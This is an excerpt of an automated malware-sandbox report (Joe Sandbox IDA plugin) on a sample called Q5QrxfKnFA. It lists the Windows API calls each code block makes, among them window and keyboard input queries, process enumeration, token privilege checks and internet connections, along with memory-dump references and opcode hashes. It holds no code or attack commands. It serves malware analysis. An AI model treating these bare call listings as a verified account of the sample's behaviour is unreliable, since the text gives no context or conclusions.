                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: 1e4fc330342d4e2c71f0cbc6302a27745246bbef7baee6681a3b763521d5aed0
                                                        • Instruction ID: cafd62066dd45ab20ca57d8de63e41213300a23ffaee4d1e0b3b79fab764b7a4
                                                        • Opcode Fuzzy Hash: 1e4fc330342d4e2c71f0cbc6302a27745246bbef7baee6681a3b763521d5aed0
                                                        • Instruction Fuzzy Hash: 473149319402186FFF3B8B658C04BFEBBAAEB47320F04432AE4959A1D1C3399D558752
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003761FB
                                                        • __isleadbyte_l.LIBCMT ref: 00376229
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00376257
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0037628D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: 415b520b8fc3586b3627d5baa6c926b8506654287a7d09bd609ecefc3a18394d
                                                        • Instruction ID: a83b810835cd3f65c9e3a1a6421f37b2d875e41580a74d42bc2e31c356b6c5e0
                                                        • Opcode Fuzzy Hash: 415b520b8fc3586b3627d5baa6c926b8506654287a7d09bd609ecefc3a18394d
                                                        • Instruction Fuzzy Hash: 3831D431600A45AFDF339F65CC5ABBA7BB9FF41310F168428E81897192D735D950DB50
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 003C4F02
                                                          • Part of subcall function 003A3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003A365B
                                                          • Part of subcall function 003A3641: GetCurrentThreadId.KERNEL32 ref: 003A3662
                                                          • Part of subcall function 003A3641: AttachThreadInput.USER32(00000000,?,003A5005), ref: 003A3669
                                                        • GetCaretPos.USER32(?), ref: 003C4F13
                                                        • ClientToScreen.USER32(00000000,?), ref: 003C4F4E
                                                        • GetForegroundWindow.USER32 ref: 003C4F54
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: e5f8dc702ff60a3a5bdf09feab78cd67b1e7c97fb8cd13f6b68a629cf668567b
                                                        • Instruction ID: 4ebcbc7e7bb98f010325d767fd9ee7dd31adee3c74b6532620aca75627ba1d6f
                                                        • Opcode Fuzzy Hash: e5f8dc702ff60a3a5bdf09feab78cd67b1e7c97fb8cd13f6b68a629cf668567b
                                                        • Instruction Fuzzy Hash: FE311C71D00108AFDB01EFA9C985EEFB7FDEF99304F10446AE415EB251DA71AE458BA0
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 003A3C7A
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 003A3C88
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 003A3CA8
                                                        • CloseHandle.KERNEL32(00000000), ref: 003A3D52
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 420147892-0
                                                        • Opcode ID: fa211cde4ea76973f5a637deed556a728e4a277fe0b4b9eeae0d50540f5ce1dc
                                                        • Instruction ID: 709323be9fb86c1db29116ddacaaffdb5cd7342de5b3ea1f5f0302a626394fd8
                                                        • Opcode Fuzzy Hash: fa211cde4ea76973f5a637deed556a728e4a277fe0b4b9eeae0d50540f5ce1dc
                                                        • Instruction Fuzzy Hash: 8031A431108345DFD306EF50C885EAFBBE8EF95354F50082DF481CA1A2EB71AA49CB52
                                                        APIs
                                                          • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                        • GetCursorPos.USER32(?), ref: 003CC4D2
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0037B9AB,?,?,?,?,?), ref: 003CC4E7
                                                        • GetCursorPos.USER32(?), ref: 003CC534
                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0037B9AB,?,?,?), ref: 003CC56E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                        • String ID:
                                                        • API String ID: 2864067406-0
                                                        • Opcode ID: e49590f4db61f01e5e20169c930182b98e1f68fa9be6e648b35e9037446ca18f
                                                        • Instruction ID: c190a3580473d84fac2c0976573ef9de9a9f4d4990937b3ed4f86cc65c6ddc91
                                                        • Opcode Fuzzy Hash: e49590f4db61f01e5e20169c930182b98e1f68fa9be6e648b35e9037446ca18f
                                                        • Instruction Fuzzy Hash: 89319335510018AFCB169F59C858EAB7BBAEB0A310F454069F909DB2A1CB31AD50DFA4
                                                        APIs
                                                          • Part of subcall function 0039810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00398121
                                                          • Part of subcall function 0039810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0039812B
                                                          • Part of subcall function 0039810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0039813A
                                                          • Part of subcall function 0039810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00398141
                                                          • Part of subcall function 0039810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00398157
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003986A3
                                                        • _memcmp.LIBCMT ref: 003986C6
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003986FC
                                                        • HeapFree.KERNEL32(00000000), ref: 00398703
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                        • String ID:
                                                        • API String ID: 1592001646-0
                                                        • Opcode ID: 6ee1e2bdc9bc4c7bceeaee5502049a96c0f4656eee077bd56a5f87ced6e6357c
                                                        • Instruction ID: e35cf7d5c08a4ff7a078ac8a934d677a9dbc00836dd8fbe1d3ac8041babd5497
                                                        • Opcode Fuzzy Hash: 6ee1e2bdc9bc4c7bceeaee5502049a96c0f4656eee077bd56a5f87ced6e6357c
                                                        • Instruction Fuzzy Hash: 9F219D72E40109EFDF11DFA8C949BEEB7B9EF86304F198059E544AB240DB31AE05CB90
                                                        APIs
                                                        • __setmode.LIBCMT ref: 003609AE
                                                          • Part of subcall function 00345A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003A7896,?,?,00000000), ref: 00345A2C
                                                          • Part of subcall function 00345A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003A7896,?,?,00000000,?,?), ref: 00345A50
                                                        • _fprintf.LIBCMT ref: 003609E5
                                                        • OutputDebugStringW.KERNEL32(?), ref: 00395DBB
                                                          • Part of subcall function 00364AAA: _flsall.LIBCMT ref: 00364AC3
                                                        • __setmode.LIBCMT ref: 00360A1A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                        • String ID:
                                                        • API String ID: 521402451-0
                                                        • Opcode ID: 2c31477ea2653e5a9f0574e619bda3ff2eba3c0875e7227a340362ec041ed66f
                                                        • Instruction ID: 050e48632b58f1400798344f993d46b5e056d86b869de414a7748ae62f4e8f31
                                                        • Opcode Fuzzy Hash: 2c31477ea2653e5a9f0574e619bda3ff2eba3c0875e7227a340362ec041ed66f
                                                        • Instruction Fuzzy Hash: 961105329042046FDB07B7B49C479BE7BA9DF46320F248056F2055F192EF21585247A5
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003B17A3
                                                          • Part of subcall function 003B182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003B184C
                                                          • Part of subcall function 003B182D: InternetCloseHandle.WININET(00000000), ref: 003B18E9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Internet$CloseConnectHandleOpen
                                                        • String ID:
                                                        • API String ID: 1463438336-0
                                                        • Opcode ID: bfc95d0e6113a64ddc9ad0b3a53133a640890752d51b5aa86bce20fd034cad02
                                                        • Instruction ID: abb17ad7ef1dd5d54374559c0a4afd4002f6827ac47341ba779f6fd501f0d802
                                                        • Opcode Fuzzy Hash: bfc95d0e6113a64ddc9ad0b3a53133a640890752d51b5aa86bce20fd034cad02
                                                        • Instruction Fuzzy Hash: A6218032600605BFEB139F60DC11FFABBAEFB48714F50412AFB15DA950DB71A82197A0
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,003CFAC0), ref: 003A3A64
                                                        • GetLastError.KERNEL32 ref: 003A3A73
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 003A3A82
                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003CFAC0), ref: 003A3ADF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                        • String ID:
                                                        • API String ID: 2267087916-0
                                                        • Opcode ID: ed19ba9f66bc4d2f948bc19ca765310b7411e93a434d864520fa8f90dfa6344d
                                                        • Instruction ID: 4941184b98a2d5daf53ef22b95d53079d45672c7d5412edb0076789fa2f4846e
                                                        • Opcode Fuzzy Hash: ed19ba9f66bc4d2f948bc19ca765310b7411e93a434d864520fa8f90dfa6344d
                                                        • Instruction Fuzzy Hash: 5721A7755082159F8311DF28C8818ABBBE8FF56364F104A2DF4D9CB2A2D731EE45CB52
                                                        APIs
                                                        • _free.LIBCMT ref: 00375101
                                                          • Part of subcall function 0036571C: __FF_MSGBANNER.LIBCMT ref: 00365733
                                                          • Part of subcall function 0036571C: __NMSG_WRITE.LIBCMT ref: 0036573A
                                                          • Part of subcall function 0036571C: RtlAllocateHeap.NTDLL(00C30000,00000000,00000001,00000000,?,?,?,00360DD3,?), ref: 0036575F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free
                                                        • String ID:
                                                        • API String ID: 614378929-0
                                                        • Opcode ID: 4f3b2ef19f43a6c9e6300ba8ce92db2c7a52bba1cdb7377aa42706c9df40adec
                                                        • Instruction ID: 02d99fcdbdebf287ddf14e0f2c5aa7b2c7ffce20e8aafe72c87f60e4753b0322
                                                        • Opcode Fuzzy Hash: 4f3b2ef19f43a6c9e6300ba8ce92db2c7a52bba1cdb7377aa42706c9df40adec
                                                        • Instruction Fuzzy Hash: D911E372500A15AFCF372F70AC05B6E3B9C9B04362F61C629F90C9A254DEB889408794
                                                        APIs
                                                        • _memset.LIBCMT ref: 003444CF
                                                          • Part of subcall function 0034407C: _memset.LIBCMT ref: 003440FC
                                                          • Part of subcall function 0034407C: _wcscpy.LIBCMT ref: 00344150
                                                          • Part of subcall function 0034407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00344160
                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00344524
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00344533
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0037D4B9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                        • String ID:
                                                        • API String ID: 1378193009-0
                                                        • Opcode ID: 091dc9ba0ec8dc874dae1067af21235dc623ac24a197a4c4769f0d9422732f3e
                                                        • Instruction ID: c7ff32ba1e67925bb90fbf37ffc1a28d554dac0232db321b9546ab641df09b84
                                                        • Opcode Fuzzy Hash: 091dc9ba0ec8dc874dae1067af21235dc623ac24a197a4c4769f0d9422732f3e
                                                        • Instruction Fuzzy Hash: C621C270904784AFEB338B25D895BE7BBECAF06314F0444EDE69E9A181C7747A84CB51
                                                        APIs
                                                          • Part of subcall function 00345A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003A7896,?,?,00000000), ref: 00345A2C
                                                          • Part of subcall function 00345A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003A7896,?,?,00000000,?,?), ref: 00345A50
                                                        • gethostbyname.WSOCK32(?), ref: 003B6399
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003B63A4
                                                        • _memmove.LIBCMT ref: 003B63D1
                                                        • inet_ntoa.WSOCK32(?), ref: 003B63DC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                        • String ID:
                                                        • API String ID: 1504782959-0
                                                        • Opcode ID: fd2baf512e567a941fe3b533942567e194b6fa8da89a5a8fd3cdb1c843ad7f21
                                                        • Instruction ID: 53f864d451924378cf871ea09ee9c770157349f7b3ca4434d41b45b3e46f781f
                                                        • Opcode Fuzzy Hash: fd2baf512e567a941fe3b533942567e194b6fa8da89a5a8fd3cdb1c843ad7f21
                                                        • Instruction Fuzzy Hash: 05115E32900109AFCB06FBA4DD46DEEB7B9EF08314B144065F506EF162DB31AE14DB61
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00398B61
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00398B73
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00398B89
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00398BA4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: b1a5f12190042a69b6844b4e9d4fc15efa43e8c24839080110274dea7f6e9ccb
                                                        • Instruction ID: f01c84ff28bbfb7e6d5b3c0a45b7c66a416b413b7134d7db7b9854ab2f34e009
                                                        • Opcode Fuzzy Hash: b1a5f12190042a69b6844b4e9d4fc15efa43e8c24839080110274dea7f6e9ccb
                                                        • Instruction Fuzzy Hash: 9B110A7A901218BFEF11DB95C885E9DBBB8EB49710F244095E900B7250DA716E11DB94
                                                        APIs
                                                          • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 003412D8
                                                        • GetClientRect.USER32(?,?), ref: 0037B5FB
                                                        • GetCursorPos.USER32(?), ref: 0037B605
                                                        • ScreenToClient.USER32(?,?), ref: 0037B610
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                        • String ID:
                                                        • API String ID: 4127811313-0
                                                        • Opcode ID: 7feb374552b38fb7184ec106ac83baeba051276fad98f17bca4ddc9e46733133
                                                        • Instruction ID: 93b39b192860411239dbd01e1a2374304baa07debb1460146254df38475b4dcd
                                                        • Opcode Fuzzy Hash: 7feb374552b38fb7184ec106ac83baeba051276fad98f17bca4ddc9e46733133
                                                        • Instruction Fuzzy Hash: 3C113A35600519EFCB12EF98D889DFE77F9EB05300F404866FA41EB140D770BA919BA5
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0039D84D
                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0039D864
                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0039D879
                                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0039D897
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                        • String ID:
                                                        • API String ID: 1352324309-0
                                                        • Opcode ID: 0f8d76de69e275e7aab28a8f8c8187053847c864639a14316fcb1fb7b9117d0d
                                                        • Instruction ID: 2cb5305799123c1b9f69fac2f322c161aec9d71ad019d14f60bcb1f8e6039bd3
                                                        • Opcode Fuzzy Hash: 0f8d76de69e275e7aab28a8f8c8187053847c864639a14316fcb1fb7b9117d0d
                                                        • Instruction Fuzzy Hash: CE116175609305EFEB218FA1DC0AF93BBFCEB00B00F108569A516D6451D7B0E5499BA1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction ID: fcab8033ce09ea5ba8d7ba139b5e7447f35dde372033eb0792ddb109996f6aca
                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction Fuzzy Hash: 94014B7244814EBBCF275F84CC01CEE3F66BB18350B598425FA1C59031D23AD9B1AB81
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 003CB2E4
                                                        • ScreenToClient.USER32(?,?), ref: 003CB2FC
                                                        • ScreenToClient.USER32(?,?), ref: 003CB320
                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 003CB33B
                                                        Memory Dump Source
